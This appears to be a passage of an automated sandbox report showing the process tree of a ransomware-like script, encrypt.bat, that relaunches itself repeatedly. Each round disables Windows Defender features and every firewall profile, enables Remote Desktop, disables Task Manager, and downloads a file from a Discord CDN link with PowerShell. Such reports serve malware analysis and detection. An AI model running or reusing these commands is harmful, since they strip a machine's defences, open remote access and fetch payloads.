                                                                                                                                                                                                                                                              PID:4572
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                PID:1916
                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                  PID:3540
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                  22⤵
                                                                                                                                                                                                                                                                    PID:3088
                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                      PID:512
                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                        PID:1552
                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                          PID:4980
                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                            PID:5096
                                                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                            netsh firewall set opmode disable
                                                                                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                                                                                              PID:2340
                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                              netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                              PID:3468
                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                              netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                              PID:3056
                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                              netsh advfirewall set domainprofile state off
                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                              PID:3196
                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                              netsh advfirewall set privateprofile state off
                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                              PID:4224
                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                              netsh advfirewall set publicprofile state off
                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                                PID:4976
                                                                                                                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                netsh advfirewall set allprofiles state off
                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                PID:5032
                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                  PID:2776
                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                  22⤵
                                                                                                                                                                                                                                                                                    PID:3532
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                      PID:372
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                                                                                                        PID:4324
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                          PID:1928
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                          PID:1032
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                          PID:512
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:4552
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                                                                                            23⤵
                                                                                                                                                                                                                                                                                              PID:1916
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                                                                                                24⤵
                                                                                                                                                                                                                                                                                                  PID:920
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                                                    PID:3172
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                                      PID:4280
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                                                        PID:4876
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                                                                          PID:4008
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                            PID:4568
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                                                                                                                              PID:4544
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                              24⤵
                                                                                                                                                                                                                                                                                                                PID:4808
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                24⤵
                                                                                                                                                                                                                                                                                                                  PID:768
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                  netsh firewall set opmode disable
                                                                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                  PID:208
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                  netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                                                                    PID:3360
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                    netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                                                      PID:3172
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                      netsh advfirewall set domainprofile state off
                                                                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                      PID:208
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                      netsh advfirewall set privateprofile state off
                                                                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                                                                        PID:3176
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                        netsh advfirewall set publicprofile state off
                                                                                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                                                                                          PID:4808
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                          netsh advfirewall set allprofiles state off
                                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                          PID:2516
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                                            PID:920
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                              24⤵
                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                              PID:4168
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                              24⤵
                                                                                                                                                                                                                                                                                                                                PID:3120
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                24⤵
                                                                                                                                                                                                                                                                                                                                  PID:3532
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                                                                                    PID:2844
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                    PID:3964
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:3792
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                                                                                        PID:1096
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                          reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                                                            PID:1872
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                                                              PID:2464
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                              reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                                                PID:4008
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4544
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4168
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2700
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4348
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1800
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4840
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                            netsh firewall set opmode disable
                                                                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                            PID:1048
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                            netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                            PID:3176
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                            netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5032
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set domainprofile state off
                                                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                              PID:1928
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set privateprofile state off
                                                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                                                                PID:3772
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                netsh advfirewall set publicprofile state off
                                                                                                                                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                PID:4800
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                netsh advfirewall set allprofiles state off
                                                                                                                                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5012
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3796
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                    PID:4520
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                    PID:1928
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                    PID:4332
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                    PID:4160
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                    PID:4880
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                    PID:4348
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3356
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                          reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                                                                                                                                                                          28⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:3172
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                            28⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3088
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                              reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1208
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                                28⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2068
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                                  28⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4820
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                    28⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4396
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                                      28⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                      PID:400
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                      28⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3172
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                        PID:4160
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                        netsh firewall set opmode disable
                                                                                                                                                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:3120
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                          netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                                                                                                                                                                                                          28⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1048
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                            netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                                                                                                                                                            28⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2136
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set domainprofile state off
                                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                              PID:4816
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set privateprofile state off
                                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                              PID:1084
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set publicprofile state off
                                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                              PID:3956
